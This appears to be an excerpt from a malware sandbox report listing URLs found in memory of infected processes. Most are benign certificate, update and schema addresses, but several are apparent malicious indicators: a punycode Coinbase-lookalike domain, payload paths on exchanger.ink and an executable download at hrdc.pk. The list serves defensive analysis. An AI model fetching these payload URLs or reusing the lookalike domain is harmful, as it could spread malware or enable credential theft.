Source: xj40xovMsm.exe, 00000019.00000002.2617932750.00000229B8CB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://auth.xn--conbase-sfb.xyz/api/update2.packdll
Source: explorer.exe, 00000002.00000002.3162050946.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1785022693.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1787337320.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: svchost.exe, 00000003.00000002.3145605822.000002147840F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: explorer.exe, 00000002.00000002.3162050946.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1785022693.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1787337320.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000002.00000002.3162050946.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1785022693.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1787337320.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: svchost.exe, 00000018.00000002.3190686238.000000000512F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: svchost.exe, 00000018.00000002.3191349230.000000000515B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: svchost.exe, 00000003.00000003.1807789448.0000021478318000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: edb.log.3.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: edb.log.3.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: edb.log.3.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000003.00000003.1807789448.0000021478318000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000003.00000003.1807789448.0000021478318000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000003.00000003.1807789448.000002147834D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: relog.exe, relog.exe, 00000037.00000002.2852161070.0000023277648000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://exchanger.ink/api/update.pack
Source: relog.exe	String found in binary or memory: http://exchanger.ink/api/update2.pack
Source: relog.exe, 00000035.00000002.2752497355.0000028619D58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://exchanger.ink/api/update2.pack.
Source: relog.exe, 00000037.00000002.2852161070.0000023277648000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://exchanger.ink/api/update2.pack6
Source: edb.log.3.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: explorer.exe, 00000002.00000003.1887290891.000000000AB33000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://hrdc.pk/Server.exe
Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000307B000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003617000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: explorer.exe, 00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000307B000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000000.1890364340.0000000000AC2000.00000002.00000001.01000000.00000010.sdmp, svchost.exe, 00000018.00000002.3174046241.0000000003A15000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.3152328073.00000000029CD000.00000004.00000800.00020000.00000000.sdmp, jqnnpe.exe, 00000027.00000000.2525684288.0000000000277000.00000002.00000001.01000000.0000001B.sdmp, jqnnpe.exe.24.dr, 4BC4.tmp.Client.exe.2.dr	String found in binary or memory: http://ip-api.com/xml
Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003617000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/xmld
Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003617000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.comd
Source: 62AB.tmp.build.exe, 00000014.00000002.2293823850.000000000107E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ns.ao
Source: explorer.exe, 00000002.00000002.3162050946.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1785022693.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1787337320.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000002.00000000.1785022693.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: 4336.tmp.Server.exe, 00000006.00000002.3152347475.0000000002A7C000.00000004.00000800.00020000.00000000.sdmp, 476D.tmp.Server.exe, 00000009.00000002.2874806986.0000000002E7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pastebin.com
Source: 4336.tmp.Server.exe, 00000006.00000002.3152347475.0000000002A7C000.00000004.00000800.00020000.00000000.sdmp, 476D.tmp.Server.exe, 00000009.00000002.2874806986.0000000002E7C000.00000004.00000800.00020000.00000000.sdmp, 476D.tmp.Server.exe, 00000009.00000002.2874806986.0000000002EA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pastebin.comd
Source: 62AB.tmp.build.exe, 00000014.00000002.2293823850.000000000107E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://purl.oen
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/System.ServiceModel
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/System.ServiceModelD
Source: explorer.exe, 00000002.00000002.3162050946.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1787337320.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.mi
Source: explorer.exe, 00000002.00000002.3162050946.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1787337320.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.micr
Source: explorer.exe, 00000002.00000002.3166491979.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1786313530.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1785818560.0000000007F40000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rmX
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: 3CBD.tmp.Installer.exe, 00000005.00000002.1941590624.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, 4336.tmp.Server.exe, 00000006.00000002.3152347475.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, 476D.tmp.Server.exe, 00000009.00000002.2874806986.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, accc.exe, 0000000B.00000002.3143963860.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, 5087.tmp.update.exe, 0000000E.00000002.2095704106.0000000002A98000.00000004.00000800.00020000.00000000.sdmp, 5E16.tmp.aaa.exe, 00000013.00000002.3142832732.0000000002B7B000.00000004.00000800.00020000.00000000.sdmp, 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.3152328073.0000000002801000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/:hardwares.
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/D
